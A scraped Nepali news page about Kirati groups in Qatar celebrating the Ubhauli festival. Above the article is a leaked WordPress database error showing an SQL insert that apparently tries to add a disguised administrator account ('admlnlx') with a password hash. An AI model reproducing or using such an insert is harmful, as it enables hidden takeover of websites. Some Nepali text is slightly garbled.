WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIn8b919fgByYfiMC8scJgmAgKl19J0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 01:43:53', '', 'admlnlx', 'admlnlx')

तीन किराती संस्थाहरुले प्रवासमा उभौली चाड मनाउदै – Gaule Khabar

तीन किराती संस्थाहरुले प्रवासमा उभौली चाड मनाउदै

तीन किराती संस्थाहरुले प्रवासमा उभौली चाड मनाउदै

काठमाण्डौ । कतारमा स्थापित तीन किराती संस्थाहरु किरात राई यायोक्खा शाखा कतार, सुनुवार सेवा समाज शाखा कतार र किरात याक्थुङ चुम्लुङ कतारको संयुक्त आयोजनामा किरात मूल समारोह आयोजक समितिले किरातीहरुको महान चाड ूसालिवा स्यादर पिदार, यक्वा तङ्नाम, साकेला उभौली(५०८२ू कार्यक्रम यहि मिति २० मे २०२२ शुक्रवारका दिन दोहाको नज्मा स्थित शालिमार होटेलमा मनाउन लागेको छ ।

सुनुवार सेवा समाज शाखा कतारको अध्यक्ष जनक सुनुवारको संयोजकत्वमा, नेपाल आदिवासी जनजाति महासंघ कतारका अध्यक्ष पुरुषोतम सुनुवारको प्रमुख आतिथ्यमा तथा उप संयोजकहरु किरात याक्थुम चुम्लुङ कतारका अध्यक्ष हर्क खजुम लिम्बू र किरात राई यायोख्खा शाखा कतारका अध्यक्ष शंकर मान राई साथै विभिन्न सामाजिक संघ सस्थाहरु, समाजसेवी, व्यवसायी, बुद्धिजीविहरु लगायत कतारमा रहेका किराती दाजुभाई तथा दिदि बहिनीहरुको उपस्थितिमा शुभकामना आदानप्रदान तथा किरातीहरुको मौलिक सांस्कृतिक झाकी लगायत स्थानीय कलाकारहरुको बेजोड सास्कृतिक प्रस्तुतिको साथ मनाउन लागेका हुन ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका